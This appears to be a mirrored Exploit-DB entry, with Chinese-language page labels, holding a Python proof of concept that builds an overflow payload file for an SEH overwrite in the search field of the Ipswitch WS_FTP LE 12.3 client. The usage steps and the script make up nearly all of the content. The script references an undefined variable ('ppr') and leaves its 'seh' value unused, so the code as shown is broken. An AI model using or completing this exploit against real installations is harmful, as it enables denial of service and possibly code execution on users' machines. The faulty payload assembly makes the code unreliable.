Ipswitch WS_FTP LE 12.3 – Search field Overwrite (SEH) (PoC)

Exploit Database
14 阅读

作者： Zahid Adeel

日期： 2016-05-10
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39796/

#!/usr/bin/python
#Author: Zahid Adeel
#Author Email: exploiter.zee@gmail.com
#Title: Ipswitch WS_FTP LE 12.3 - Search field SEH Overwrite POC
#Vendor Homepage: http://www.wsftple.com/ 
#Software Link: http://www.wsftple.com/download.aspx
#Version: LE 12.3
#Tested on: Windows 8.1 x64 Pro
#Date: 2016-05-10

#Steps:
#Run WS_FTP LE client, Navigate to "Local Search" option in the Tools menu, paste the contents of wsftple-poc.txt in search field and press Enter.

fname="wsftple-poc.txt"

junk = "A" * 840
n_seh = "BBBB"
seh = "CCCC"

padding = "F" * (1000 - len(junk) - 8)
poc = junk + n_seh + ppr + padding

fhandle = open(fname , 'wb')
fhandle.write(poc)
fhandle.close()

last Exploits
Ipswitch WS_FTP LE 12.3 – Search field Overwrite (SEH) (PoC)的更多信息

Novell Netware – RPC XNFS xdrDecodeString：
Putty pscp 0.66 – Stack Buffer Overwrite：
GNU glibc – ‘strcoll()’ Routine Integer Overflow：
Microsoft Internet Explorer 11.0.9600.18097 – COmWindowProxy::SwitchMarkup NULL PTR：
gnutls 3.6.6 – ‘verify_crt()’ Use-After-Free：
Google Chrome V8 – ‘Genesis::InitializeGlobal’ Out-of-Bounds Read/Write：
Core FTP LE 2.2 – Buffer Overflow (PoC)：
Lyric Video Creator 2.1 – ‘.mp3’ Denial of Service (PoC)：